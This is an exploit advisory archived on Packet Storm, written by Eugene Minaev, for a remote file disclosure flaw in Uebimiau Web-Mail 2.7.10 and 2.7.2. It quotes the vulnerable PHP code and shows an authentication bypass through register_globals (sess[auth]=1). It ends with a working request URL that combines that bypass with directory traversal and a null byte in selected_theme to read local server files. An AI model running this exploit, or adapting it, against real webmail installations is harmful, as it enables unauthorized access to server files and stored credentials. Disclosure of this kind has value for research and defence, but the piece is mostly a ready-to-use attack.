exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

uebimiau-disclose.txt

uebimiau-disclose.txt
Posted Jan 7, 2008
Authored by Eugene Minaev | Site itdefence.ru

Uebimiau Web-Mail versions 2.7.10 and 2.7.2 remote file disclosure exploit.

tags | exploit, remote, web, info disclosure
SHA-256 | b8d7b04407659575cf8f8665fa836b1bc6f536840aa16b967a0eae4904004c01

uebimiau-disclose.txt

Change Mirror Download
----[ Uebimiau Web-Mail Remote File Reader ... ITDefence.ru Antichat.ru ]

Uebimiau Web-Mail Remote File Reader
Eugene Minaev underwater@itdefence.ru
___________________________________________________________________
____/ __ __ _______________________ _______ _______________ \ \ \
/ .\ / /_// // / \ \/ __ \ /__/ /
/ / /_// /\ / / / / /___/
\/ / / / / /\ / / /
/ / \/ / / / / /__ //\
\ / ____________/ / \/ __________// /__ // /
/\\ \_______/ \________________/____/ 2007 /_//_/ // //\
\ \\ // // /
.\ \\ -[ ITDEFENCE.ru Security advisory ]- // // / .
. \_\\________[________________________________________]_________//_//_/ . .


At first i decided to look login script . Each script includes this code

<?php
if(strlen($f_pass) > 0) {

..elseif (
($sess["auth"] && intval((time()-$start)/60) < $idle_timeout)) {

$UM->mail_user = $f_user = $sess["user"];
$UM->mail_pass = $f_pass = $sess["pass"];
$UM->mail_server = $f_server = $sess["server"];
$UM->mail_email = $f_email = $sess["email"];

} else {
Header("Location: ./index.php?tid=$tid&lid=$lid\r\n");
exit;
}
?>

So , if register_globals on , we can make a request like script.php?f_pass=+toxa+&sess[auth]=1
to make script think that we are authorized user . Then i looked each script to find something
interest.

<?php
define("SMARTY_DIR","./smarty/");
require_once(SMARTY_DIR."Smarty.class.php");
$smarty = new Smarty;
$smarty->compile_dir = $temporary_directory;
$smarty->security=true;
$smarty->secure_dir=array("./");
$smarty->assign("umLanguageFile",$selected_language.".txt");
?>

Looks great :) But selected_language was already defined . But there was a similar code with EXTRACT.
So , we can read local files on server !

<?php
if($phpver >= 4.1) {
extract($_GET);
}

$smarty->assign("umSid",$sid);
$smarty->assign("umLid",$lid);
$smarty->assign("umTid",$tid);

$smarty->assign("umErrorCode",$err);

$smarty->display("$selected_theme/error.htm");
?>

http://test1.ru/uebimiau/error.php?f_pass=blackybr&sess[auth]=1&selected_theme=../ksuri.php%00




----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close